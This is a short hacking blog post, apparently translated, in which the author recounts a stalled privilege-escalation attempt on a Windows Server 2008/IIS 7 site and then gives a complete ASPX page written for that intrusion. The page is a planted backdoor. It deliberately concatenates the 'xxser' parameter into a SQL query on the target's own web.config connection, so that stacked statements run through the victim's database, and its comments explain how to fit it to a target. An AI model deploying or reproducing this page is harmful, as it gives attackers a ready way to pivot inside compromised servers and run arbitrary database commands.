Yesterday 4z1 and I were looking at a site where privilege escalation was really hard to pull off. Stared at it for a full five hours with no result. Server 2008 + IIS 7, no sa, no root, no services of any kind to lean on...
Part of it involved using aspx constructed injection to go cross-site; I found a pile of code online and not one piece of it worked.
It's not much code, so I just wrote one myself. So annoying.
<%@ Page Language="C#" %>
<%@ Import Namespace="System.Configuration" %>
<%@ Import Namespace="System.Data.SqlClient" %>
<script runat="server">
    // Runs whatever arrives in ?xxser=... through the target site's own database
    // connection. The string concatenation below is the point of this page: it is
    // deliberately injectable, so the payload is appended to the query verbatim.
    void Page_Init(object sender, EventArgs e)
    {
        // Replace ConnectionName with a name from the target's web.config <connectionStrings>.
        string cs = ConfigurationManager.ConnectionStrings["ConnectionName"].ConnectionString;
        string i = this.Page.Request.Params["xxser"]; // the parameter: ?xxser=1

        using (SqlConnection conn = new SqlConnection(cs))
        {
            conn.Open();
            // Replace [Table] and ColumnName with a real table and column on the target.
            SqlCommand command = new SqlCommand("select * from [Table] where ColumnName = " + i, conn);
            // ExecuteNonQuery returns the number of rows affected; a plain SELECT returns -1,
            // so only stacked INSERT/UPDATE/EXEC statements produce a meaningful count here.
            int x = command.ExecuteNonQuery();
            Response.Write(Server.HtmlEncode(i) + "\n");
            Response.Write(x);
        } // the using block closes the connection even if the query throws
    }
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<title>暗影 aspx constructed-injection page</title>
</head>
<body>
<form id="form1" runat="server">
<div>
</div>
</form>
</body>
</html>